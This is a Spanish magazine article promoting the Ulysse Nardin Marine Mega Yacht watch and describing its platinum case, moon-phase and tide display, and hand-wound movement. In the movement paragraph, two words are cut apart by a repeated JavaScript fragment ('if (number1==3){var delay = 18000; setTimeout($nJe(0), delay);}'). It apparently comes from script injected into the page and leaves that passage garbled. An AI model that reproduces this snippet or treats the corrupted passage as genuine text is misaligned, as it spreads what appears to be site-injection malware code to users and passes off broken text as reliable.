Reloj para amantes de la navegación

    Reloj para amantes de la navegación

    Listo para zarpar.

    Autor: Redacción Maxim 7 noviembre, 2019


     
    FOTO: Cortesía

     

     

    El mar, la luna y el lujo a la altura de la muñeca con este reloj especialmente diseñado para amantes de los yates.

     

     

    Construido con el mismo espíritu que un mega yate de lujo, el Marine Mega Yacht de Ulysse Nardinviene con una propuesta sofisticada y exclusiva para los fieles amantes de la navegación y los viajes atrevidos en altamar.

     

     

    Con una generosa caja de platino de 44 mm y correa de cocodrilo azul, además de mostrar la hora y cautivar con su tourbillon, este reloj proporciona el ciclo de vida de la luna con una presentación tridimensional de sus fases. Y no solo eso, esta edición especial de tan solo 30 piezas presenta en el dial un indicador que muestra la altura de las mareas en tiempo real en relación con una ubicación específica.

     

     

    En cuanto al movimiento —de 37 mm compuesto por 504 partes y resistencia bar de 50 metros—, pretende ser un homenaje a la navegación; de mecánica elegante y visible al reverso, evocandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando la sala de máquinas de un yate a través de un fondo de cristal de zafiro, con un calibre de cuerda manual UN-631 y puentes terminados en un diseño industrial, similar a un motor, proporcionandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando una reserva de energía de 80 horas.

     

     

    Sin duda alguna, el Marine Mega Yacht, le brinda al marino y aventurero casual todo lo que necesita saber, en un impresionante reloj con guiños a mega yates.

     

     

     

     

     

     

    SUPERYATE DE 217 PIES ES EL MÁS EQUIPADO DEL OCÉANO

     

    Temas relacionados con esta nota: , , , , ,

Listo para zarpar.